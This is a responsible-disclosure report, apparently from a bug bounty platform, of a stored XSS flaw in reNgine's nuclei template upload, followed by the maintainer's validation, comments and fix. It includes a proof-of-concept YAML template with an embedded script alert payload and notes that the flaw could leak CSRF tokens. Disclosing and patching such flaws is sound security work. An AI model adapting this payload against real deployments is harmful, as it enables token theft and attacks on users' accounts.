Cross-site Scripting (XSS) - Stored in yogeshojha/rengine

Valid

Reported on

Aug 31st 2021

✍️ Description

Hi, When creating a template for nuclei, it is possible to upload a malicious template with xss load, clicking to see this template will run xss.

🕵️‍♂️ Proof of Concept

1- First, create the fake template:

id: poc-xss
#<script>alert(1)</script>
info:
  name: xss-storage-rengine
  author: phor3nsic
  severity: low

requests:
  - method: GET
    path:
        - "{{BaseURL}}/"

    matchers:
      - type: regex
        regex:
          - "\\<title\\>poc\\s"
        part: body

2- Upload of this template, and click to view!

💥 Impact

It's possible leak csrftoken of the users and bypass this feature, performing csrf attack for other accounts.

Occurrences

custom_tools.js L18

We have contacted a member of the yogeshojha/rengine team and are waiting to hear back 2 years ago

Yogesh Ojha validated this vulnerability 2 years ago

Walleson Moura has been awarded the disclosure bounty

The fix bounty is now up for grabs

Yogesh Ojha

commented 2 years ago

Maintainer

This is a good finding. Though the exploitability is very less likely. You'd have to convenience a user to upload a malicious nuclei template. And since we are likely to not have CSRF, the only way you could deliver the payload is probably social engineering.

Neverthless, a very good finding. This means you guys are hunting bugs literally everywhere lol :D Good job.

Patch is on its way

Yogesh Ojha marked this as fixed with commit ab89a2 2 years ago

Yogesh Ojha has been awarded the fix bounty

This vulnerability will not receive a CVE

Yogesh Ojha

commented 2 years ago

Maintainer

Thank you for reporting this. I've pushed the patches. Additionally, I've also fixed XSS for Tool config input box, and GF patterns upload as well.

You may retest them and update me if you find any other instances of XSS.

Thank you again for reporting this and I very much appreciate it.

Thank you for making open source secure <3